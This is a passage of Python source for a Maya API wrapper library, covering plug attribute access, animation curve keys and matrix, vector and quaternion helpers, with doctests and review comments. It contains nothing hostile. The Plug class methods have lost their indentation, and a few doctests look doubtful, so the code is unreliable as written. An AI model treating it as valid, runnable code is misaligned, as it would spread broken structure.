            node = encode(node)

            if not type or op(type, getattr(node._fn, other)):
                yield node
class AnimCurve(Node):
    if __maya_version__ >= 2016:
        def __init__(self, mobj, exists=True, modifier=None):
            super(AnimCurve, self).__init__(mobj, exists, modifier)
            self._fna = oma.MFnAnimCurve(mobj)

        def key(self, time, value, interpolation=Linear):
            """Set or insert a key at `time`

            Arguments:
                time (float): Time in current UI units
                value (float): Value of the key
                interpolation (int, optional): In/out tangent type,
                    defaults to Linear

            """
            time = om.MTime(time, om.MTime.uiUnit())
            index = self._fna.find(time)

            # BUGFIX: find() returns None when no key exists at `time`.
            # A plain truth-test misclassified index 0 as "not found",
            # adding a duplicate key rather than editing the existing one.
            if index is not None:
                self._fna.setValue(index, value)
            else:
                self._fna.addKey(time, value, interpolation, interpolation)

        def keys(self, times, values, interpolation=Linear):
            """Set several keys at once

            Arguments:
                times (list): Times, in the current time unit
                values (list): One value per time

            """
            # BUGFIX: materialise into a list. Under Python 3 `map`
            # returns an iterator, which has no len() and is always
            # truthy — breaking addKeys() and every diagnostic below.
            times = [om.MTime(t, TimeUnit) for t in times]

            try:
                self._fna.addKeys(times, values)

            except RuntimeError:
                # The errors provided by Maya aren't very descriptive;
                # help a brother out by looking for common problems.

                if not times:
                    log.error("No times were provided: %s" % str(times))

                if not values:
                    log.error("No values were provided: %s" % str(values))

                if len(values) != len(times):
                    log.error(
                        "Count mismatch; len(times)=%d, len(values)=%d" % (
                            len(times), len(values)
                        )
                    )

                raise
class Plug(object):
def __abs__(self):
    """Return absolute value of plug

    Example:
        >>> node = createNode("transform")
        >>> node["tx"] = -10
        >>> abs(node["tx"])
        10.0

    """
    return abs(self.read())

def __bool__(self):
    """if plug:

    Example:
        >>> node = createNode("transform")
        >>> node["tx"] = 10
        >>> if node["tx"]:
        ...   True
        ...
        True

    """
    return bool(self.read())

# Python 2 compatibility; __nonzero__ is the Python 2 name of __bool__
__nonzero__ = __bool__

def __float__(self):
    """Return plug as floating point value

    Example:
        >>> node = createNode("transform")
        >>> float(node["visibility"])
        1.0

    """
    return float(self.read())

def __int__(self):
    """Return plug as int

    Example:
        >>> node = createNode("transform")
        >>> int(node["visibility"])
        1

    """
    return int(self.read())
def __eq__(self, other):
    """Compare plug to `other`

    Example:
        >>> node = createNode("transform")
        >>> node["visibility"] == True
        True
        >>> node["visibility"] == node["nodeState"]
        False
        >>> node["visibility"] != node["nodeState"]
        True

    """
    # Plugs compare by value; unwrap the right-hand side first
    rhs = other.read() if isinstance(other, Plug) else other
    return self.read() == rhs

def __ne__(self, other):
    rhs = other.read() if isinstance(other, Plug) else other
    return self.read() != rhs
def __neg__(self):
    """Negate unary operator

    Example:
        >>> node = createNode("transform")
        >>> node["visibility"] = 1
        >>> -node["visibility"]
        -1

    """
    return -self.read()

def __div__(self, other):
    """Python 2.x division

    Example:
        >>> node = createNode("transform")
        >>> node["tx"] = 5
        >>> node["ty"] = 2
        >>> node["tx"] / node["ty"]
        2.5

    """
    divisor = other.read() if isinstance(other, Plug) else other
    return self.read() / divisor

def __truediv__(self, other):
    """Float division, e.g. self / other"""
    divisor = other.read() if isinstance(other, Plug) else other
    return self.read() / divisor
def __add__(self, other):
    """Support legacy add string to plug

    Note:
        Adding to short name is faster, e.g. node["t"] + "x",
        than adding to longName, e.g. node["translate"] + "X"

    Example:
        >>> node = createNode("transform")
        >>> node["tx"] = 5
        >>> node["translate"] + "X"
        5.0
        >>> node["t"] + "x"
        5.0
        >>> try:
        ...   node["t"] + node["r"]
        ... except TypeError:
        ...   error = True
        ...
        >>> error
        True

    """
    # Guard: only string suffixes are meaningful here
    if not isinstance(other, str):
        raise TypeError(
            "unsupported operand type(s) for +: 'Plug' and '%s'"
            % type(other)
        )

    try:
        # E.g. node["t"] + "x"
        return self._node[self.name() + other]

    except ExistError:
        # E.g. node["translate"] + "X"
        return self._node[self.name(long=True) + other]
def __iadd__(self, other):
    """Support += operator, for .append()

    Example:
        >>> node = createNode("transform")
        >>> node["myArray"] = Double(array=True)
        >>> node["myArray"].append(1.0)
        >>> node["myArray"].extend([2.0, 3.0])
        >>> node["myArray"] += 5.1
        >>> node["myArray"] += [1.1, 2.3, 999.0]
        >>> node["myArray"][0]
        1.0
        >>> node["myArray"][6]
        999.0
        >>> node["myArray"][-1]
        999.0

    """
    # Normalise to a sequence, then append each entry in order
    entries = other if isinstance(other, (tuple, list)) else [other]

    for entry in entries:
        self.append(entry)

    return self
def __str__(self):
    """Return value as str

    Example:
        >>> node = createNode("transform")
        >>> str(node["tx"])
        '0.0'

    """
    return str(self.read())

def __repr__(self):
    return str(self.read())

def __rshift__(self, other):
    """Support connecting attributes via A >> B"""
    self.connect(other)

def __lshift__(self, other):
    """Support connecting attributes via A << B"""
    # Reversed direction: `other` becomes the source
    other.connect(self)

def __floordiv__(self, other):
    """Disconnect attribute via A // B

    Example:
        >>> nodeA = createNode("transform")
        >>> nodeB = createNode("transform")
        >>> nodeA["tx"] >> nodeB["tx"]
        >>> nodeA["tx"] = 5
        >>> nodeB["tx"] == 5
        True
        >>> nodeA["tx"] // nodeB["tx"]
        >>> nodeA["tx"] = 0
        >>> nodeB["tx"] == 5
        True

    """
    self.disconnect(other)
def __iter__(self):
    """Iterate over value as a tuple

    Example:
        >>> node = createNode("transform")
        >>> node["translate"] = (0, 1, 2)
        >>> for index, axis in enumerate(node["translate"]):
        ...   assert axis == float(index)
        ...   assert isinstance(axis, Plug)
        ...
        >>> a = createNode("transform")
        >>> a["myArray"] = Message(array=True)
        >>> b = createNode("transform")
        >>> c = createNode("transform")
        >>> a["myArray"][0] << b["message"]
        >>> a["myArray"][1] << c["message"]
        >>> a["myArray"][0] in list(a["myArray"])
        True
        >>> a["myArray"][1] in list(a["myArray"])
        True
        >>> for single in node["visibility"]:
        ...   print(single)
        ...
        True
        >>> node = createNode("wtAddMatrix")
        >>> node["wtMatrix"][0]["weightIn"] = 1.0

    """
    if self._mplug.isArray:
        # getExisting... returns indices currently in use, which is
        # important if the given array is *sparse*. That is, if
        # indexes 5, 7 and 8 are used. If we simply call
        # `evaluateNumElements` then it'll return a single number
        # we could use to `range()` from, but that would only work
        # if the indices were contiguous.
        for index in self._mplug.getExistingArrayAttributeIndices():
            yield self[index]

    elif self._mplug.isCompound:
        # Yield each child plug, e.g. tx, ty, tz for translate
        for index in range(self._mplug.numChildren()):
            yield self[index]

    else:
        values = self.read()

        # Facilitate single-value attributes
        values = values if isinstance(values, (tuple, list)) else [values]

        for value in values:
            yield value
def __getitem__(self, index):
    """Read from child of array or compound plug

    Arguments:
        index (int): Logical index of plug (NOT physical, make note)

    Example:
        >>> _ = cmds.file(new=True, force=True)
        >>> node = createNode("transform", name="mynode")
        >>> node["translate"][0].read()
        0.0
        >>> node["visibility"][0]
        Traceback (most recent call last):
        ...
        TypeError: |mynode.visibility does not support indexing
        >>> node["translate"][2] = 5.1
        >>> node["translate"][2].read()
        5.1

    """
    cls = self.__class__

    if isinstance(index, int):
        # Support backwards-indexing
        # NOTE(review): count() calls evaluateNumElements, which
        # presumes an array plug — negative indices on a compound
        # plug look unsupported; confirm before relying on it
        if index < 0:
            index = self.count() - abs(index)

        if self._mplug.isArray:
            item = self._mplug.elementByLogicalIndex(index)
            return cls(self._node, item, self._unit)

        elif self._mplug.isCompound:
            item = self._mplug.child(index)
            return cls(self._node, item, self._unit)

        else:
            raise TypeError(
                "%s does not support indexing" % self.path()
            )

    elif isinstance(index, string_types):
        # Compound attributes have no equivalent
        # to "MDependencyNode.findPlug()" and must
        # be searched by hand.
        if self._mplug.isCompound:
            for child in range(self._mplug.numChildren()):
                child = self._mplug.child(child)
                _, name = child.name().rsplit(".", 1)

                if index == name:
                    return cls(self._node, child)

        else:
            raise TypeError("'%s' is not a compound attribute"
                            % self.path())

        raise ExistError("'%s' was not found" % index)

def __setitem__(self, index, value):
    """Write to child of array or compound plug

    Example:
        >>> node = createNode("transform")
        >>> node["translate"][0] = 5
        >>> node["tx"]
        5.0

    """
    # Resolve the child via __getitem__ above, then write to it
    self[index].write(value)
def __init__(self, node, mplug, unit=None, key=None, modifier=None):
    """A Maya plug

    Arguments:
        node (Node): Parent Node of plug
        mplug (maya.api.OpenMaya.MPlug): Internal Maya plug
        unit (int, optional): Unit with which to read plug
        key: NOTE(review): usage not visible in this fragment —
            presumably the name this plug was looked up by; confirm
        modifier (om.MDGModifier, optional): Operations are
            deferred to this modifier

    """
    assert isinstance(node, Node), "%s is not a Node" % node
    self._node = node
    self._mplug = mplug
    self._unit = unit
    # Cache slot for previously read values; not written to here
    self._cached = None
    self._key = key
    self._modifier = modifier

def plug(self):
    # Expose the underlying API 2.0 MPlug
    return self._mplug

@property
def isArray(self):
    return self._mplug.isArray

@property
def isCompound(self):
    return self._mplug.isCompound
def append(self, value):
    """Add `value` to end of self, which is an array
    Arguments:
        value (object): If value, create a new entry and append it.
            If cmdx.Plug, create a new entry and connect it.
    Example:
        >>> _ = cmds.file(new=True, force=True)
        >>> node = createNode("transform", name="appendTest")
        >>> node["myArray"] = Double(array=True)
        >>> node["myArray"].append(1.0)
        >>> node["notArray"] = Double()
        >>> node["notArray"].append(2.0)
        Traceback (most recent call last):
        ...
        TypeError: "|appendTest.notArray" was not an array attribute
    """
    # Guard: appending only makes sense on array plugs
    if not self._mplug.isArray:
        raise TypeError("\"%s\" was not an array attribute" % self.path())

    # Next unused logical index
    end = self.count()

    if isinstance(value, Plug):
        # Plugs are connected rather than copied
        self[end] << value
    else:
        self[end].write(value)
def extend(self, values):
    """Append multiple values to the end of an array
    Arguments:
        values (tuple): If values, create a new entry and append it.
            If cmdx.Plug's, create a new entry and connect it.
    Example:
        >>> node = createNode("transform")
        >>> node["myArray"] = Double(array=True)
        >>> node["myArray"].extend([1.0, 2.0, 3.0])
        >>> node["myArray"][0]
        1.0
        >>> node["myArray"][-1]
        3.0
    """
    # Delegates per-element handling (including the
    # array-attribute guard) to append()
    for value in values:
        self.append(value)
def count(self):
    """Return the number of evaluated elements of this array plug"""
    return self._mplug.evaluateNumElements()
def asDouble(self, time=None):
    """Return plug as double (Python float)
    Example:
        >>> node = createNode("transform")
        >>> node["translateX"] = 5.0
        >>> node["translateX"].asDouble()
        5.0
    """
    # Without an explicit time, read in the current context
    if time is None:
        return self._mplug.asDouble()
    return self._mplug.asDouble(DGContext(time=time))
def asMatrix(self, time=None):
    """Return plug as MatrixType
    Example:
        >>> node1 = createNode("transform")
        >>> node2 = createNode("transform", parent=node1)
        >>> node1["translate"] = (0, 5, 0)
        >>> node2["translate"] = (0, 5, 0)
        >>> plug1 = node1["matrix"]
        >>> plug2 = node2["worldMatrix"][0]
        >>> mat1 = plug1.asMatrix()
        >>> mat2 = plug2.asMatrix()
        >>> mat = mat1 * mat2
        >>> tm = TransformationMatrix(mat)
        >>> list(tm.translation())
        [0.0, 15.0, 0.0]
    """
    # Pass a DG context only when an explicit time was requested
    args = []
    if time is not None:
        args.append(DGContext(time=time))

    data = self._mplug.asMObject(*args)
    return om.MFnMatrixData(data).matrix()
def asTransformationMatrix(self, time=None):
    """Return plug as TransformationMatrix
    Example:
        >>> node = createNode("transform")
        >>> node["translateY"] = 12
        >>> node["rotate"] = 1
        >>> tm = node["matrix"].asTm()
        >>> map(round, tm.rotation())
        [1.0, 1.0, 1.0]
        >>> list(tm.translation())
        [0.0, 12.0, 0.0]
    """
    # NOTE(review): the map() doctest above is Python 2 style;
    # on Python 3 map() returns an iterator — confirm the doctest
    # suite accounts for this.
    return TransformationMatrix(self.asMatrix(time))

# Alias
asTm = asTransformationMatrix
def asEulerRotation(self, order=kXYZ, time=None):
    """Return plug value as an MEulerRotation with rotation `order`

    Arguments:
        order (int, optional): Rotation order, defaults to kXYZ
        time (float, optional): Time at which to read the plug
    """
    value = self.read(time=time)
    return om.MEulerRotation(value, order)
def asQuaternion(self, time=None):
    """Return plug value as a Quaternion

    The plug is read as an euler-compatible rotation value and
    converted to its quaternion form.

    Arguments:
        time (float, optional): Time at which to read the plug
    """
    value = self.read(time=time)

    # Bug fix: the converted quaternion was previously assigned
    # but never returned, so this method always returned None.
    return Euler(value).asQuaternion()
def asVector(self, time=None):
    """Return plug value as a Vector

    Requires the plug to be an array or compound (e.g. translate).
    """
    assert self.isArray or self.isCompound, "'%s' not an array" % self
    return Vector(self.read(time=time))

@property
def connected(self):
    """Return whether or not this attribute is connected (to anything)"""
    return self.connection() is not None
@property
def locked(self):
    """Is this plug locked?"""
    return self._mplug.isLocked

@locked.setter
def locked(self, value):
    """Lock attribute"""
    # Arrays/compounds are locked per-element/per-child;
    # iterating self yields those child plugs
    elements = (
        self
        if self.isArray or self.isCompound
        else [self]
    )
    # Use setAttr in place of MPlug.isKeyable = False, as that
    # doesn't persist the scene on save if the attribute is dynamic.
    for el in elements:
        cmds.setAttr(el.path(), lock=value)

def lock(self):
    """Convenience for locked = True"""
    self.locked = True

def unlock(self):
    """Convenience for locked = False"""
    self.locked = False
@property
def channelBox(self):
    """Is the attribute visible in the Channel Box?"""
    # For arrays/compounds, all children must be visible
    if self.isArray or self.isCompound:
        return all(
            plug._mplug.isChannelBox
            for plug in self
        )
    else:
        return self._mplug.isChannelBox

@channelBox.setter
def channelBox(self, value):
    elements = (
        self
        if self.isArray or self.isCompound
        else [self]
    )
    # Use setAttr in place of MPlug.isChannelBox = False, as that
    # doesn't persist the scene on save if the attribute is dynamic.
    # NOTE(review): this also toggles `keyable` alongside
    # `channelBox` — confirm that coupling is intended.
    for el in elements:
        cmds.setAttr(el.path(), keyable=value, channelBox=value)
@property
def keyable(self):
    """Is the attribute keyable?"""
    # For arrays/compounds, all children must be keyable
    if self.isArray or self.isCompound:
        return all(
            plug._mplug.isKeyable
            for plug in self
        )
    else:
        return self._mplug.isKeyable

@keyable.setter
def keyable(self, value):
    elements = (
        self
        if self.isArray or self.isCompound
        else [self]
    )
    # Use setAttr in place of MPlug.isKeyable = False, as that
    # doesn't persist the scene on save if the attribute is dynamic.
    for el in elements:
        cmds.setAttr(el.path(), keyable=value)
@property
def hidden(self):
    """Is the attribute marked hidden on its MFnAttribute?"""
    return om.MFnAttribute(self._mplug.attribute()).hidden

@hidden.setter
def hidden(self, value):
    # NOTE(review): intentionally a no-op as written — assigning
    # to `hidden` silently does nothing; confirm whether this is
    # a placeholder or should mirror hide()/show().
    pass
def hide(self):
    """Hide attribute from channel box
    Note: An attribute cannot be hidden from the channel box
    and keyable at the same time. Therefore, this method
    also makes the attribute non-keyable.
    Supports array and compound attributes too.
    """
    self.keyable = False
    self.channelBox = False

def lockAndHide(self):
    """Convenience for lock() followed by hide()"""
    self.lock()
    self.hide()
@property
def default(self):
    """Return default value of plug"""
    return _plug_to_default(self._mplug)
def reset(self):
    """Restore plug to default value"""
    # Guard clause: refuse to touch locked/connected plugs
    if not self.writable:
        raise TypeError(
            "Cannot reset non-writable attribute '%s'" % self.path()
        )

    self.write(self.default)
@property
def writable(self):
    """Can the user write to this attribute?
    Convenience for combined call to `plug.connected`
    and `plug.locked`.
    Example:
        >> if node["translateX"].writable:
        .. node["translateX"] = 5
    """
    # Writable iff neither connected nor locked
    return not (self.connected or self.locked)
def show(self):
    """Show attribute in channel box
    Note: An attribute can be both visible in the channel box
    and non-keyable, therefore, unlike :func:`hide()`, this
    method does not alter the keyable state of the attribute.
    """
    self.channelBox = True

def type(self):
    """Retrieve API type of plug as string
    Example:
        >>> node = createNode("transform")
        >>> node["translate"].type()
        'kAttribute3Double'
        >>> node["translateX"].type()
        'kDoubleLinearAttribute'
    """
    return self._mplug.attribute().apiTypeStr
def path(self):
    """Return full node-qualified path, e.g. '|mynode.translateX'"""
    return "%s.%s" % (
        self._node.path(), self._mplug.partialName(
            includeNodeName=False,
            useLongNames=True,
            useFullAttributePath=True
        )
    )

def name(self, long=False):
    """Return attribute name without the node prefix

    Arguments:
        long (bool, optional): Use long attribute names
    """
    return self._mplug.partialName(
        includeNodeName=False,
        useLongNames=long,
        useFullAttributePath=True
    )
def read(self, unit=None, time=None):
    """Read attribute value
    Arguments:
        unit (int, optional): Unit with which to read plug
        time (float, optional): Time at which to read plug
    Example:
        >>> node = createNode("transform")
        >>> node["ty"] = 100.0
        >>> node["ty"].read()
        100.0
        >>> node["ty"].read(unit=Meters)
        1.0
    """
    # Explicit argument wins over the unit stored at construction
    unit = unit if unit is not None else self._unit
    context = None if time is None else DGContext(time=time)
    try:
        value = _plug_to_python(
            self._mplug,
            unit=unit,
            context=context
        )
        # Store cached value, keyed on both attribute key and unit
        # so reads in different units don't collide
        self._node._state["values"][self._key, unit] = value
        return value
    except RuntimeError:
        raise
    except TypeError:
        # Expected errors
        log.error("'%s': failed to read attribute" % self.path())
        raise
def write(self, value):
    """Write `value` to this plug

    If an undone modifier is associated with this plug, defer
    the write to that modifier instead of applying it directly.
    """
    if not getattr(self._modifier, "isDone", True):
        return self._modifier.setAttr(self, value)
    try:
        _python_to_plug(value, self)
        # Remember last written value
        self._cached = value
    except RuntimeError:
        raise
    except TypeError:
        log.error("'%s': failed to write attribute" % self.path())
        raise
def connect(self, other, force=True):
    """Connect self -> `other`

    Arguments:
        other (Plug): Destination plug
        force (bool, optional): Break any existing incoming
            connection on `other` first, defaults to True
    """
    # Defer to an associated, not-yet-done modifier when present
    if not getattr(self._modifier, "isDone", True):
        return self._modifier.connect(self, other, force)
    mod = om.MDGModifier()
    if force:
        # Disconnect any plug connected to `other`
        for plug in other._mplug.connectedTo(True, False):
            mod.disconnect(plug, other._mplug)
    mod.connect(self._mplug, other._mplug)
    mod.doIt()
def disconnect(self, other=None, source=True, destination=True):
    """Disconnect self from `other`
    Arguments:
        other (Plug, optional): If none is provided, disconnect everything
        source (bool, optional): Disconnect incoming connections
        destination (bool, optional): Disconnect outgoing connections
    Example:
        >>> node1 = createNode("transform")
        >>> node2 = createNode("transform")
        >>> node2["tx"].connection() is None
        True
        >>> node2["ty"].connection() is None
        True
        >>>
        >>> node2["tx"] << node1["tx"]
        >>> node2["ty"] << node1["ty"]
        >>> node2["ty"].connection() is None
        False
        >>> node2["tx"].connection() is None
        False
        >>>
        >>> node2["tx"].disconnect(node1["tx"])
        >>> node2["ty"].disconnect()
        >>> node2["tx"].connection() is None
        True
        >>> node2["ty"].connection() is None
        True
    """
    # None stays None; a Plug is unwrapped to its MPlug
    other = getattr(other, "_mplug", None)
    if not getattr(self._modifier, "isDone", True):
        mod = self._modifier
        mod.disconnect(self._mplug, other, source, destination)
        # Don't do it, leave that to the parent context
    else:
        mod = DGModifier()
        mod.disconnect(self._mplug, other, source, destination)
        mod.doIt()
def connections(self,
                type=None,
                source=True,
                destination=True,
                plugs=False,
                unit=None):
    """Yield plugs connected to self
    Arguments:
        type (int, optional): Only return nodes of this type
        source (bool, optional): Return source plugs,
            default is True
        destination (bool, optional): Return destination plugs,
            default is True
        plugs (bool, optional): Return connected plugs instead of nodes
        unit (int, optional): Return plug in this unit, e.g. Meters
    Example:
        >>> _ = cmds.file(new=True, force=True)
        >>> a = createNode("transform", name="A")
        >>> b = createNode("multDoubleLinear", name="B")
        >>> a["ihi"] << b["ihi"]
        >>> a["ihi"].connection() == b
        True
        >>> b["ihi"].connection() == a
        True
        >>> a["ihi"]
        2
    """
    # Compare against typeId by default, typeName for strings
    op = operator.eq
    other = "typeId"
    if isinstance(type, string_types):
        other = "typeName"
    if isinstance(type, (tuple, list)):
        # NOTE(review): when `type` is a tuple, `other` stays
        # "typeId", so a tuple of type-name strings would be
        # compared against typeIds and never match — confirm
        # callers only pass tuples of typeIds.
        op = operator.contains
    for plug in self._mplug.connectedTo(source, destination):
        mobject = plug.node()
        node = Node(mobject)
        if not type or op(type, getattr(node._fn, other)):
            yield Plug(node, plug, unit) if plugs else node
def connection(self,
               type=None,
               source=True,
               destination=True,
               plug=False,
               unit=None):
    """Return first connection from :func:`connections()`"""
    # next() with a default of None rather than raising StopIteration
    return next(self.connections(type=type,
                                 source=source,
                                 destination=destination,
                                 plugs=plug,
                                 unit=unit), None)
def source(self, unit=None):
    """Return the source plug connected to self, or None

    Arguments:
        unit (int, optional): Unit with which to read the plug
    """
    cls = self.__class__
    plug = self._mplug.source()

    # Bug fix: only construct the Node once we know a source
    # exists; previously Node() was called on the MObject of a
    # null plug before the isNull check, which can fail.
    if not plug.isNull:
        return cls(Node(plug.node()), plug, unit)
def node(self):
    """Return the Node this plug belongs to"""
    return self._node
# Optional snake_case aliases for the camelCase API above
if ENABLE_PEP8:
    as_double = asDouble
    as_matrix = asMatrix
    as_transformation_matrix = asTransformationMatrix
    as_euler_rotation = asEulerRotation
    as_quaternion = asQuaternion
    as_vector = asVector
    channel_box = channelBox
    lock_and_hide = lockAndHide
class TransformationMatrix(om.MTransformationMatrix):
    """A more readable version of Maya's MTransformationMatrix
    Added:
        - Takes tuples/lists in place of MVector and other native types
        - Support for multiplication
        - Support for getting individual axes
        - Support for direct access to the quaternion
    Arguments:
        matrix (Matrix, TransformationMatrix, optional): Original constructor
        translate (tuple, Vector, optional): Initial translate value
        rotate (tuple, Vector, optional): Initial rotate value
        scale (tuple, Vector, optional): Initial scale value
    """

    def __init__(self, matrix=None, translate=None, rotate=None, scale=None):
        # It doesn't like being handed `None`
        args = [matrix] if matrix is not None else []
        super(TransformationMatrix, self).__init__(*args)
        if translate is not None:
            self.setTranslation(translate)
        if rotate is not None:
            self.setRotation(rotate)
        if scale is not None:
            self.setScale(scale)

    def __mul__(self, other):
        # Tuples/lists are promoted to vectors first
        if isinstance(other, (tuple, list)):
            other = Vector(*other)
        if isinstance(other, om.MVector):
            # Transform a point: rotate then translate
            p = self.translation()
            q = self.quaternion()
            return p + q * other
        elif isinstance(other, om.MMatrix):
            return type(self)(self.asMatrix() * other)
        elif isinstance(other, om.MTransformationMatrix):
            return type(self)(self.asMatrix() * other.asMatrix())
        else:
            raise TypeError(
                "unsupported operand type(s) for *: '%s' and '%s'"
                % (type(self).__name__, type(other).__name__)
            )

    @property
    def xAxis(self):
        # Rotated basis vectors of this transform
        return self.quaternion() * Vector(1, 0, 0)

    @property
    def yAxis(self):
        return self.quaternion() * Vector(0, 1, 0)

    @property
    def zAxis(self):
        return self.quaternion() * Vector(0, 0, 1)

    def translateBy(self, vec, space=None):
        """Add `vec` to the translation, in `space` (transform by default)"""
        space = space or sTransform
        if isinstance(vec, (tuple, list)):
            vec = Vector(vec)
        return super(TransformationMatrix, self).translateBy(vec, space)

    def rotateBy(self, rot, space=None):
        """Handle arguments conveniently
        - Allow for optional `space` argument
        - Automatically convert tuple to Vector
        Arguments:
            rot (Vector, Quaternion): Rotation to add
        """
        space = space or sTransform
        if isinstance(rot, (tuple, list)):
            rot = Vector(rot)
        # Vectors are interpreted as euler angles (radians)
        if isinstance(rot, om.MVector):
            rot = EulerRotation(rot)
        return super(TransformationMatrix, self).rotateBy(rot, space)

    def quaternion(self):
        """Return transformation matrix as a Quaternion"""
        return Quaternion(self.rotation(asQuaternion=True))

    def rotatePivot(self, space=None):
        """This method does not typically support optional arguments"""
        space = space or sTransform
        return super(TransformationMatrix, self).rotatePivot(space)

    def translation(self, space=None):
        """This method does not typically support optional arguments"""
        space = space or sTransform
        return super(TransformationMatrix, self).translation(space)

    def setTranslation(self, trans, space=None):
        """Set translation, accepting Plug, tuple/list or vector"""
        if isinstance(trans, Plug):
            trans = trans.as_vector()
        if isinstance(trans, (tuple, list)):
            trans = Vector(*trans)
        space = space or sTransform
        return super(TransformationMatrix, self).setTranslation(trans, space)

    def scaleBy(self, space=None):
        """This method does not typically support optional arguments"""
        # NOTE(review): despite the name this *reads* scale rather
        # than adding to it (it is also aliased as `scale` below) —
        # confirm the misleading name is intentional.
        space = space or sTransform
        return Vector(super(TransformationMatrix, self).scale(space))

    def setScale(self, seq, space=None):
        """This method does not typically support optional arguments"""
        if isinstance(seq, Plug):
            seq = seq.as_vector()
        if isinstance(seq, (tuple, list)):
            seq = Vector(*seq)
        space = space or sTransform
        return super(TransformationMatrix, self).setScale(seq, space)

    def rotation(self, asQuaternion=False):
        """Return rotation, optionally as a quaternion"""
        return super(TransformationMatrix, self).rotation(asQuaternion)

    def setRotation(self, rot):
        """Interpret three values as an euler rotation"""
        if isinstance(rot, Plug):
            rot = rot.as_vector()
        if isinstance(rot, (tuple, list)):
            try:
                rot = Vector(rot)
            except ValueError:
                traceback.print_exc()
                raise ValueError(
                    "I tried automatically converting your "
                    "tuple to a Vector, but couldn't.."
                )
        if isinstance(rot, Vector):
            rot = EulerRotation(rot)
        return super(TransformationMatrix, self).setRotation(rot)

    def asMatrix(self):
        """Return this transform as a MatrixType"""
        return MatrixType(super(TransformationMatrix, self).asMatrix())

    def asMatrixInverse(self):
        """Return the inverse of this transform as a MatrixType"""
        return MatrixType(super(TransformationMatrix, self).asMatrixInverse())

    # A more intuitive alternative
    translate = translateBy
    rotate = rotateBy
    scale = scaleBy

    if ENABLE_PEP8:
        x_axis = xAxis
        y_axis = yAxis
        z_axis = zAxis
        translate_by = translateBy
        rotate_by = rotateBy
        set_translation = setTranslation
        set_rotation = setRotation
        set_scale = setScale
        as_matrix = asMatrix
        as_matrix_inverse = asMatrixInverse
class MatrixType(om.MMatrix):
    def __call__(self, *item):
        """Native API 2.0 MMatrix does not support indexing
        API 1.0 however *does*, except only for elements
        and not rows. Screw both of those, indexing isn't hard.
        Arguments:
            item (int, tuple): 1 integer for row, 2 for element
        Identity/default matrix:
            [[1.0, 0.0, 0.0, 0.0]]
            [[0.0, 1.0, 0.0, 0.0]]
            [[0.0, 0.0, 1.0, 0.0]]
            [[0.0, 0.0, 0.0, 1.0]]
        Example:
            >>> m = MatrixType()
            >>> m(0, 0)
            1.0
            >>> m(0, 1)
            0.0
            >>> m(1, 1)
            1.0
            >>> m(2, 1)
            0.0
            >>> m(3, 3)
            1.0
            >>>
            >>> m(0)
            (1.0, 0.0, 0.0, 0.0)
        """
        if len(item) == 1:
            return self.row(*item)
        elif len(item) == 2:
            return self.element(*item)
        else:
            raise ValueError(
                "Must provide either 1 or 2 coordinates, "
                "for row and element respectively"
            )

    def __mul__(self, other):
        # Preserve MatrixType through arithmetic
        return type(self)(super(MatrixType, self).__mul__(other))

    def __div__(self, other):
        # Python 2 division operator only; Python 3 would use __truediv__
        return type(self)(super(MatrixType, self).__div__(other))

    def inverse(self):
        """Return the inverse as a MatrixType"""
        return type(self)(super(MatrixType, self).inverse())

    def row(self, index):
        """Return 4-tuple for row `index` (0-3)"""
        values = tuple(self)
        return (
            values[index * 4 + 0],
            values[index * 4 + 1],
            values[index * 4 + 2],
            values[index * 4 + 3]
        )

    def element(self, row, col):
        """Return element at (`row`, `col`)"""
        # NOTE(review): due to operator precedence this reads
        # row * 4 + (col % 4); for col in 0-3 it equals row*4+col,
        # but col >= 4 silently wraps — confirm intended.
        values = tuple(self)
        return values[row * 4 + col % 4]

# Alias
Transformation = TransformationMatrix
Tm = TransformationMatrix
Mat = MatrixType
Mat4 = MatrixType
Matrix4 = MatrixType
class Vector(om.MVector):
    """Maya's MVector
    Example:
        >>> vec = Vector(1, 0, 0)
        >>> vec * Vector(0, 1, 0)  # Dot product
        0.0
        >>> vec ^ Vector(0, 1, 0)  # Cross product
        maya.api.OpenMaya.MVector(0, 0, 1)
    """

    def __add__(self, value):
        # Scalars are broadcast across all three components
        if isinstance(value, (int, float)):
            return type(self)(
                self.x + value,
                self.y + value,
                self.z + value,
            )
        return super(Vector, self).__add__(value)

    def __iadd__(self, value):
        # Same broadcast rule for in-place addition;
        # returns a new instance rather than mutating self
        if isinstance(value, (int, float)):
            return type(self)(
                self.x + value,
                self.y + value,
                self.z + value,
            )
        return super(Vector, self).__iadd__(value)

# Alias, it can't take anything other than values
# and yet it isn't explicit in its name.
Vector3 = Vector
class Point(om.MPoint):
    """Maya's MPoint"""

class BoundingBox(om.MBoundingBox):
    """Maya's MBoundingBox"""

    def volume(self):
        """Return width * height * depth of this box"""
        return self.width * self.height * self.depth
class Quaternion(om.MQuaternion):
    """Maya's MQuaternion
    Example:
        >>> q = Quaternion(0, 0, 0, 1)
        >>> v = Vector(1, 2, 3)
        >>> isinstance(q * v, Vector)
        True
    """

    def __mul__(self, other):
        # quaternion * vector rotates the vector
        if isinstance(other, (tuple, list)):
            other = Vector(*other)
        if isinstance(other, om.MVector):
            return Vector(other.rotateBy(self))
        else:
            return super(Quaternion, self).__mul__(other)

    def lengthSquared(self):
        """Return squared magnitude (avoids the sqrt of length())"""
        return (
            self.x * self.x +
            self.y * self.y +
            self.z * self.z +
            self.w * self.w
        )

    def length(self):
        """Return magnitude of this quaternion"""
        return math.sqrt(self.lengthSquared())

    def isNormalised(self, tol=0.0001):
        """Is the magnitude within `tol` of 1.0?"""
        return abs(self.length() - 1.0) < tol

# Alias
Quat = Quaternion
def twistSwingToQuaternion(ts):
    """Convert twist/swing1/swing2 rotation in a Vector into a quaternion
    Arguments:
        ts (Vector): Twist, swing1 and swing2
    """
    # Half-angle tangent parameterisation of the three components
    t = tan(ts.x * 0.25)
    s1 = tan(ts.y * 0.25)
    s2 = tan(ts.z * 0.25)

    b = 2.0 / (1.0 + s1 * s1 + s2 * s2)
    c = 2.0 / (1.0 + t * t)

    quat = Quaternion()
    quat.w = (b - 1.0) * (c - 1.0)
    quat.x = -t * (b - 1.0) * c
    quat.y = -b * (c * t * s1 + (c - 1.0) * s2)
    quat.z = -b * (c * t * s2 - (c - 1.0) * s1)

    # NOTE(review): assert is stripped under python -O; consider
    # raising if non-normalised output must be caught in production.
    assert quat.isNormalised()
    return quat
class EulerRotation(om.MEulerRotation):
    def asQuaternion(self):
        """Return this euler rotation as a quaternion"""
        return super(EulerRotation, self).asQuaternion()

    if ENABLE_PEP8:
        as_quaternion = asQuaternion

# Alias
Euler = EulerRotation
